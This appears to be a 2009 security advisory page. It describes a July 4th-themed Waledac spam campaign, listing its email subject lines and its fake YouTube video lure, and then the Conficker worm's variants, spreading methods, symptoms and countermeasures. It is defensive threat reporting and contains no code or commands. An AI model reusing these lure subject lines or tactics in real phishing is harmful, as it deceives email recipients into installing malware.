A new Waledac spam campaign with the July 4th theme is in the wild. The malicious emails that are sent use subjects and content related to Independence Day of USA, Fourth of July and fireworks shows.

Some of the subject lines of this spam are:

  • Happy Independence Day
  • Proud to be an American
  • Fabulous Independence Day firework
  • Bright and joyful Fourth of July
  • The best of 4th of July Salute
  • Amazing Independence Day salute
  • America for You and Me
  • Celebrate Independence
  • Well done 4th!
  • Super 4th!
  • American Independence Day
  • Celebrating Fourth of July
  • Celebrate the spirit of America
  • Celebrate with Pride
  • Celebrating the spirit of our Country
  • Happy Birthday, America!
  • Independence Day firework broke all records
  • Amazing firework 2009

A sample email is shown in the following screenshot: (Source Symantec).

Clicking on the URL will open a Youtube cloned page with what looks to be an embedded video of a fireworks show for this year’s 4th of July celebration. Screenshot of the malicious website:

Attempting to view the video will prompt the download of an executable file, which is actually the Waledac worm installer.

Users are advised to implement following countermeasures:

  • Block the emails with above mentioned subject lines
  • Block access to the domains listed in Shadow Server at the perimeter
  • Exercise caution while clicking on any link embedded inside the e-mail message/Instant messages or web pages
  • Filter e-mails with abovementioned subject lines and body
  • Install and maintain updated anti-virus software at gateway and desktop level
  • Install and maintain updated anti-spy ware software at desktop level
  • Keep up-to-date on patches and fixes on the OS and application software

References

http://www.avertlabs.com/research/blog/index.php/2009/02/09/
new-valentine-scam-on-the-loose
https://forums.symantec.com/t5/blogs/blogarticlepage/blog-id/
malicious_code/article-id/239
http://www.searchsecurityasia.com/content/beware-valentine%E2%
80%99s-day-e-card-keeps-giving
http://www.cert-in.org.in/currentacts/currentact.htm#WCDK
http://www.cert-in.org.in/virus/win32_waledac.htm
http://www.shadowserver.org/wiki/uploads/Calendar/
waledac_domains.txt
http://www.avertlabs.com/research/blog/index.php/2009/02/23/
malware-riding-on-the-tides-of-the-economic-crisis/
http://www.avertlabs.com/research/blog/index.php/2009/01/17/
do-not-worry-obama-di-not-refuse-to-be-a-president/
http://www.avertlabs.com/research/blog/index.php/2009/03/16/
breaking-news-waledac-terror-attack-in-a-city-near-you/
http://securitylabs.websense.com/content/Alerts/3343.aspx
http://www.f-secure.com/weblog/archives/00001658.html
http://www.symantec.com/connect/blogs/waledac-july-campaign
http://www.eset.com/threat-center/blog/?p=1244


Worm Conficker/Downadup/Kido widely propagating
Date : January 22, 2009
Updated : February 09, 2009; February 18, 2009; February 23, 2009;
               March 19, 2009; March 31, 2009; April 15, 2009; May 13, 2009



It has been observed that worm Win32/Conficker/Downadup/kido is spreading widely by exploiting a previously reported Server Service vulnerability described in CERT-In vulnerability note CIVN-2008-170
and Microsoft Security Bulletin MS08-067.

Apart from exploiting the said vulnerability, the attack vectors include network shares (ADMINI$ shares with a long list of hard-coded passwords), removable drives (drops a hidden autorun.inf file), scareware (fake security alerts to frighten consumers into purchasing bogus computer security software) and most recently Metasploit payload (the exploitation method derived from the metasploit ms08_067_netapi module to spread itself).

It is reported that this worm is actively infecting Windows systems with specific language operating systems such as English, Chinese, Arabic, Portugese.

It has also been reported that a list of malicious domains (randomly generated by the worm) are hosting the copy of the worm and are requested for further downloading from the infected machine.

The worm can act as a HTTP server listening to a random port between 1024 and 10000 and if the remote machine is exploited successfully, the victim will connect back to the http server and download a variant of the worm.

A new variant, Conficker B++ or C implements a new backdoor with "auto-update" functionality, allowing machines compromised by the new variant to have additional malicious code installed on them.
Conficker.C uses robust P2P to distribute cryptographically signed updates to other computers infected with conficker.This P2P functionality contains a UDP P2P discovery routine that sends UDP traffic to lists of generated IPs and ports.

A new polymorphic variant, Conficker.D infects the local computer, terminates services and blocks access to numerous Web sites. This variant does not spread to removable drives or shared folders across a network. Win32/Conficker.D may build 50,000 URLs per day to download files and only visits 500 of the generated URLs within a 24-hour period. After a successful download/execution from a generated URL, Win32/Conficker.D lays dormant for four days before resuming URL monitoring again.

Conficker-E is the latest version of the Conficker worm which ultimately drops conficker.C in the victim system.it downloads W32.Waledac trojan and it may also download rogue security tool Spyware Protect 2009.It Opens port 5114 and serve as HTTP server, by broadcasting via SSDP request. Conficker-E is set to delete itself on the May 3, 2009.

When infected the following symptoms can be observed in the affected machine:

  • Blocked access to antivirus-related sites.
  • Disabled services such as Windows Automatic Update Service, Windows Security Center, Windows Defender and Windows Error Reporting and Internet connection sharing service.
  • Resets System Restore Point.
  • High traffic on port 445 in the affected network.
  • Hidden files even after changing the ‘Folder Options’.
  • Inability to log in using Windows credentials because they are locked out

Note: Users are advised to download Conficker Removal Tools
         only from the genuine Antivirus Websites. This is because many
         websites having names related to "Conficker" are being used to
         serve Conficker Worm in place of genuine Conficker Removal          Tools.

A list of possible malicious domains are given here

Countermeasures:

Free Removal Tools:

http://support.microsoft.com/kb/962007
ftp://ftp.f-secure.com/anti-virus/tools/beta/f-downadup.zip
http://www.symantec.com/security_response/writeup.jsp?
docid=2009-011316-0247-99
http://vil.nai.com/vil/stinger/default.aspx
data2.kaspersky-labs.com:8080/special/KidoKiller_v3.1.zip
www.trendmicro.com/ftp/products/pattern/spyware/fixtool/
SysClean-WORM_DOWNAD.zip

References

http://www.cert-in.org.in/vulnerability/civn-2008-170.htm
http://www.cert-in.org.in/virus/win32_conficker.htm
http://www.avertlabs.com/research/blog/index.php/2009/01/15/
conficker-worm-using-metasploit-payload-to-spread/
http://blog.trendmicro.com/the-mess-that-is-worm_downad/
http://www.microsoft.com/security/portal/Entry.aspx?Name=
Win32%2fConficker
http://www.microsoft.com/security/portal/Entry.aspx?Name=
Worm%3aWin32%2fConficker.gen!A
http://www.microsoft.com/security/portal/Entry.aspx?Name=
Worm%3aWin32%2fConficker.A
http://www.securityfocus.com/brief/887
http://www.microsoft.com/security/portal/Entry.aspx?Name=
Worm%3aWin32%2fConficker.B
http://news.bbc.co.uk/1/hi/technology/7832652.stm
http://voices.washingtonpost.com/securityfix/2009/01/tricky_windows
_worm_wallops_mi.html?wprss=securityfix
http://support.microsoft.com/kb/962007
http://mtc.sri.com/Conficker
http://www.microsoft.com/security/portal/Entry.aspx?Name=
Worm%3aWin32%2fConficker.C
http://www.us-cert.gov/current/index.html#
new_variant_of_conficker_downadup
http://blogs.technet.com/mmpc/archive/2009/
02/20/updated-conficker-functionality.aspx
http://www.doxpara.com/?p=1285
http://www.skullsecurity.org/blog/?p=209
http://seclists.org/nmap-dev/2009/q1/0869.html
http://honeynet.org/node/388
http://www.mcafee.com/us/threat_center/conficker.html
http://iv.cs.uni-bonn.de/wg/cs/applications/containing-conficker/
http://www.microsoft.com/security/portal/Entry.aspx?
name=Worm:Win32/Conficker.E
https://forums2.symantec.com/t5/blogs/blogarticlepage/
blog-id/malicious_code/article-id/262
http://blogs.technet.com/msrc/archive/2009/04/09/conficker-e.aspx

< Previous - - Next >